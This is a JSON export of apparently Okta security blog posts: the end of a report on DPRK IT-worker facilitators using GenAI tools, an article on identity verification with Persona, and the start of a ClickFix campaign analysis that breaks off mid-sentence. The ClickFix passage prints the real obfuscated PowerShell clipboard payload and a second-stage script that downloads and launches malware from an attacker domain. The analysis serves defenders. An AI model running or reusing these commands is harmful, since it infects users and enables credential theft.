These GenAI-enhanced services are required to manage the scheduling of job interviews with multiple DPRK candidate personas by a small cadre of facilitators.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These services use GenAI in everything from tools that transcribe or summarize conversations, to real-time translation of voice and text.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Recruitment platforms\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Facilitators and candidates both make extensive use of jobseeking platforms to apply for roles.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More surprising was the use of AI-enhanced recruitment platforms typically used by recruiters (not candidates) to amplify the reach and accuracy of job postings.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access to these tools provides facilitators opportunities to advertise roles at front companies that are similar, if not identical, to those advertised by targeted organizations, in order to study the cover letters and resumes of legitimate candidates. The CVs and cover letters from legitimate jobseekers may even form part of a training set for optimizing future applications made on behalf of DPRK nationals. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These same recruitment platforms provide access to the same applicant tracking systems (ATS) that real employers use to narrow down the number of job applications a recruiter or hiring manager needs to manually review. 
Posting fake job advertisements would allow facilitators to examine what features presented in a job application are most likely to result in these AI-enhanced algorithms selecting a particular candidate over others. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At scale, these techniques dramatically improve the potential success of job applications, effectively using the recruiters’ own tools against them.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Resume/CV screening\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence assesses that facilitators are highly motivated to generate successful cover letters, CVs and interviews and address any specific criteria in a given application. \\n\\nFacilitators were observed making use of services that provide “AI Superpowers” to job applicants to help them “outsmart employers’ robots”, in order to improve the chances of a job application successfully progressing past the automated CV/resume scans used in recruiting platforms.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These services use GenAI agents to test uploaded CVs against ATS (applicant tracking software), iterating until they achieve a better result and learning which personas will be more successful in any given role. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4. 
Candidate management\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence observed services that use GenAI agents to automate the process of filling in application forms on behalf of candidates and to track the progress of candidates through the application process. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Again, these capabilities address the challenge of facilitating job applications and employment on behalf of multiple individuals and their multiple personas over multiple timezones.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5. Mock interviews\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once an application is successful, the next task for facilitators is to prepare their candidates (or the facilitator themselves, in some cases) for job interviews.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Facilitators were observed using AI-enhanced services that deploy GenAI agents to host and record first-round interviews on behalf of employers, then critique and offer improvement tips for the interviewee. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These automated “AI-based webcam interview review” services claim to assist with the appropriate use of lighting, video filters, and the candidate’s approach to conversation. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence assesses that mock interviews staged by AI agents can be used to evaluate the efficacy of deepfake overlays and of highly scripted answers to common questions, to decrease the chance of their ruse being discovered.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"6. LLM-based chatbots\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While most of the GenAI applications used by facilitators relate directly to training and recruitment, Okta Threat Intelligence also observed them constantly signing into generic chatbots powered by large language models (LLMs).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Analyzing patterns of activity, these GenAI tools appear to be relied on heavily throughout the recruitment process, as well as by successful candidates once they gain employment.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"7. Code training services\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Candidates were also observed signing into free services that offer training in specific development languages and AI tools. 
These training platforms deliver a cursory awareness of unfamiliar development skills required by a hiring organization at interview, and the bare essentials required to maintain employment for as long as possible.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In short, DPRK facilitators are AI’s “power users”\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By extensively employing AI-enhanced tools, facilitators enable minimally skilled, non-native English-speaking workers to maintain software engineering positions long enough to channel earnings towards the sanctioned DPRK regime. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The scale of observed operations suggests that even short-term employment for a few weeks or months at a time can, when scaled with automation and GenAI, present a viable economic opportunity for the DPRK. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Mitigating Controls\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To mitigate the threat posed by these campaigns, Okta Threat Intelligence recommends:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Embedding \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/idp-idv.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Identity Verification\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/02/how-okta-embraces-identity-verification-using-persona/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"key business processes\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\",\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Training staff to identify common indicators of fraudulent behavior\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detecting the unauthorized use of RMM (remote management and monitoring) tools\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta customers can access a detailed set of recommendations and detection methods by selecting 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security.okta.com\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Liam Dermody, Tim Peel, Alex Tilley and David Zielezna contributed to this research.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"},"summary":{"summary":"Nobody does GenAI quite like a fake IT worker."},"updatedAt":"2025-07-31T03:58:06.450Z","secAuthor":[{"id":"203ea27a-a295-5ec0-a53e-0ebe54e65cb9","bio":{"bio":"<p> </p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta Threat Intelligence","jobTitle":null,"slug":"/hackers/oti","node_locale":"en"}]},{"slug":"/articles/2025/02/how-okta-embraces-identity-verification-using-persona","id":"d338fe49-dc77-5ecd-a51e-56cc84e009ed","title":"How Okta Embraces Identity Verification Using Persona","date":"2025-02-05T10:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"With remote work becoming the norm, today’s organizations face a critical challenge: ensuring that users accessing their systems and data are in fact who they claim to be. 
Given our highly distributed workforce here at Okta, we leverage \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://withpersona.com/contact?utm_term=persona&utm_campaign=RP_Search_Brand_US_CA_UK&utm_source=google&utm_medium=ppc&utm_content=710836266667&hsa_acc=5817921572&hsa_cam=21625765091&hsa_grp=166502542276&hsa_ad=710836266667&hsa_src=g&hsa_tgt=kwd-12277670&hsa_kw=persona&hsa_mt=b&hsa_net=adwords&hsa_ver=3&gad_source=1&gclid=Cj0KCQiAkoe9BhDYARIsAH85cDO64it9sNgNowxILci7dLdUvHKVk8PUr2cQetAgj-niK6_B4XEM0oQaAtqHEALw_wcB\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Persona\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" for Identity verification.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The threat landscape\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Given the current geopolitical environment, it is concerningly common for individuals to use fraudulent, or stolen Identities to apply for employment with highly targeted companies, especially in the cybersecurity industry.  At best, these individuals do not have the purported skills and capabilities required for the role and can drain company resources. 
In the most extreme cases, the individuals may be from sanctioned countries and operate for malicious threat actors with the aim of generating income via ransomware attacks or acquiring sensitive, proprietary information with ill-natured intent.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"As part of the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta Secure Identity Commitment\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" (OSIC), our long-term initiative to lead the industry in the fight against Identity attacks, we’re tackling this issue head-on with the introduction of Identity verification using Persona’s trusted technology. Internally, ID verification has been introduced as a compulsory component of our evolving onboarding process and secure account recovery activities.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"What is Persona? \",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Persona’s technology offers a unified Identity platform that provides businesses the building blocks they need to securely collect, verify, manage, and make informed decisions about individuals' and businesses' Identities. 
Okta leverages Persona’s industry-leading technology to securely protect access to online accounts by verifying government-issued identification and comparing it to live, attention-aware photographs to provide greater assurance that the person behind the access attempt is in fact who they're claiming to be.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In practice, Identity verification inquiries with Persona involve up-to-date, live photography capturing varying angles in addition to government-issued photo identification, where a series of validation activities are then performed to assess the veracity of the access attempt. Only once both the photographs and identification have passed a series of secure checks, will the individual have been deemed to “pass” the verification process and subsequently gain access to the controlled environment. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Positioned highest for \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://withpersona.com/gartner-magic-quadrant?utm_term=persona&utm_campaign=RP_Search_Brand_US_CA_UK&utm_source=google&utm_medium=ppc&utm_content=710836266667&hsa_acc=5817921572&hsa_cam=21625765091&hsa_grp=166502542276&hsa_ad=710836266667&hsa_src=g&hsa_tgt=kwd-12277670&hsa_kw=persona&hsa_mt=b&hsa_net=adwords&hsa_ver=3&gad_source=1&gclid=Cj0KCQiAkoe9BhDYARIsAH85cDO64it9sNgNowxILci7dLdUvHKVk8PUr2cQetAgj-niK6_B4XEM0oQaAtqHEALw_wcB\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Ability to Execute in the 2024 Gartner Magic Quadrant for Identity Verification\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", Persona offers the following 
capabilities:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Collection, verification, enrichment and analysis of user information;\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Enablement of decision-making based on user information analysis; \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Integration of third-party data for additional insights; and \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Evaluation of behavioral risk signals and automation of decisions using customizable workflows.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta’s Use Case\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Persona’s technology offers use case customization, allowing configuration for required or non-required validation. In Okta’s case, we’ve customized our Identity verification process to include country verification to ensure legal alignment to relevant restrictions, limiting the access of Okta’s products in jurisdictions where US import controls or economic sanctions laws are in effect.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Persona’s customizable options include enabling indicators of particular interest during an Identity challenge. 
This is a key capability for insider threat security teams, who can, for example, flag the facial likeness of known malicious threat actors, which provides increased assurance against repeated attempts to gain unauthorized access to critical company resources. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"During initial testing of Persona’s capabilities, we found it to be very effective at flagging a variety of identity-based attacks while being nuanced enough to allow for benign inconsistencies that often occur with identifications and selfies, such as variation in name order (e.g. given names and surnames may be interchanged). This means the teams responsible spend less time working through false positives. Our ID proofing implementation journey has been one of ease, with Persona seamlessly integrating with our existing infrastructure and technology stack. Okta has fully embedded the Persona widget into our workflows, enabling users to verify their identity without ending their Okta session. 
\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"At 2024’s annual \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/oktane/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Oktane\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" conference, we \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/oktane-2024-announcements/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"announced\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" a new ID proofing feature that allows customers to create Identity verification challenges during a workflow, as governed by their \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/policies/oamp.htm#:~:text=The%20Okta%20account%20management%20policy%20defines%20authentication%20requirements%20when%20users,onboarding%20to%20authentication%20and%20recovery.\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta Account Management Policy\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" (OAMP). 
Through the introduction of this new feature, Okta is leveraging Persona’s technology to address two high-risk use cases where Identity verification is essential: employee onboarding and self-service account recovery.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In line with our efforts to \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"free everyone to safely use any technology\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\", the introduction of mandatory ID proofing during onboarding increases the integrity, robustness and security of Okta’s new hire process. ID proofing aims to ensure the new hire is who they say they are, and that they are the same individual who has participated throughout the recruiting process.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Post-onboarding, using ID proofing for self-service account recovery offers higher assurance that a legitimate, authorized user is the one unlocking the user account in question. This in turn reduces the risk of an impersonation attack. It also allows Okta’s technical support teams to spend less time manually performing account unlock activities for employees who find themselves locked out of their accounts.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"What’s next? \",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Persona is the first ID proofing vendor we’ve integrated with here at Okta. 
We continue to prioritize Identity verification and validation for our workforce in addition to prioritized \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/phishing-resistance/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"phishing-resistant authentication\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\".\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We’re looking forward to exploring additional ID proofing integrations to tackle evolving Identity theft trends in our continued fight against Identity threats. Stay tuned as we continue to evolve our Identity verification capabilities, partnering with industry leaders to prioritize securing your systems and data.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"Given the current geopolitical environment and remote work becoming a norm, it is increasingly common for individuals to use fraudulent, or stolen Identities to apply for employment with highly targeted companies, especially in the cybersecurity industry. This article details how Okta leverages Persona's technology for secure Identity verification."},"updatedAt":"2025-07-31T03:27:46.018Z","secAuthor":[{"id":"40d9f189-1eb3-54ae-bc99-a3b7b906cb55","bio":{"bio":"<p> Liam is the Director of Insider Threat at Okta, where he works across the company to reduce insider-related risk. A security specialist with over 15 years of diverse experience spanning analytical, technical, and leadership roles, Liam is dedicated to safeguarding critical assets. 
Working in both public and private sectors, he has successfully defended Government and industry against a broad range of national security threats, including malicious cyber actors, foreign interference, espionage, and politically-motivated violence.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5WuHbOEWREw1vzeG6cOdA7/5d7b13873a4a1c1823a9aac993edc163/ld.png"},"name":"Liam Dermody","jobTitle":"Director, Insider Threat","slug":"/hackers/liam-dermody","node_locale":"en"}]},{"slug":"/articles/2025/07/how-this-clickfix-campaign-leads-to-redline-stealer","id":"a0bb13d8-9d30-5e75-bc6b-9a09cd92c513","title":"How this ClickFix campaign leads to Redline Stealer","date":"2025-07-03T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An overwhelming share of the user credentials that are later abused in identity-based attacks arise from the compromise of unmanaged user devices. “Infostealers” are the generic name given to the class of malware designed primarily for this purpose in mind. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While infostealers are distributed via numerous means — with pirated games being high on the list — more recently, our analysts have observed malware being distributed using deceptively simple techniques: a ClickFix campaign.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Often referred to as a \\\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Prove You Are Human\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"\\\" campaign, a ClickFix campaign exploits user trust and problem-solving instincts to bypass conventional security measures.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Convincing a user to install malicious code\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the ClickFix attacks we’ve observed, attackers pay search engines to elevate their phishing pages when users search for the names of popular web applications. The sponsored link redirects the user to a website that impersonates the brand in question.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These deceptive pages will mimic legitimate security checks, such as CAPTCHA challenges that are used to prove whether a site visitor is interactive (vs a bot). \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These fake CAPTCHA or verification-type overlays lend legitimacy to the subsequent instructions provided to the user. 
The page might even subtly mimic the background image used in a real CAPTCHA service to enhance its credibility further.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Here’s an example of a site impersonating a Cloudflare CAPTCHA challenge for a user attempting and expecting to visit Okta at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://www.okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"www.okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\":\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"6JznFdLiy4AKckMpqdtZOZ\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nOnce the unsuspecting user interacts with this page, specifically by selecting “verify you are human,” they’re presented with a set of instructions designed to trick the user into downloading malware. 
Two versions are provided below: one targeting MacOS users, and the other targeting Windows users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"gMxEFxg9SQKs0BmpTyUWY\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"75QgUme0sVyjLzh0UoCV8s\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nThese instructions commonly direct the user to perform the following actions:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Press Windows Key + R\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (to open the Run dialog box).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Press CTRL + V\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (to paste a command).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Press Enter\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (to execute the command).\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Crucially, the malicious website uses JavaScript to hijack the user's clipboard, silently placing a PowerShell command onto the clipboard without the user’s knowledge, such as the example provided below. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"powershell -WindowS HIDD -c $E='23-ykfgoed8wrvnmj49xlq/pi17bh6t0zau5c.:s'; $ix=$E[24]+$E[12]+$E[15]; $JT='ht'+'tp'+'s:'+'/'+'/' + $E[7]+$E[4] + 'tahu.org/s.php?an=1'; $wF=$E[24]+$E[8]+$E[19]; &$wF (&$ix $JT);\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In this case, the PowerShell command was obfuscated, and once executed by the user, calls a site which contained the following malicious code: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"$GDSGFBKSD = [System.Guid]::NewGuid().ToString();$env:MYAPPDATA = (Get-Item $env:APPDATA).Parent.FullName;\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Invoke-WebRequest \",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"hxxps://oktahu\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"hxxps://oktahu\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"[.]org/s.php?an=2 -OutFile $env:MYAPPDATA\\\\$GDSGFBKSD.zip\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" -UseBasicParsing;Add-Type -AssemblyName System.IO.Compression.FileSystem[System.IO.Compression.ZipFile]::ExtractToDirectory(\\\"$env:MYAPPDATA\\\\$GDSGFBKSD.zip\\\", \\\"$env:MYAPPDATA\\\\$GDSGFBKSD\\\");$FHBYREYDBYFB = Join-Path $env:MYAPPDATA $GDSGFBKSD;Set-Location $FHBYREYDBYFB;Start-Process Autoit3.exe launch_traffic4.a3x -WorkingDirectory $FHBYREYDBYFB; Start-Sleep -Seconds 5; Start-Process Autoit3.exe launch_traffic4.a3x -WorkingDirectory $FHBYREYDBYFB;\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This code initiates the download and execution of 
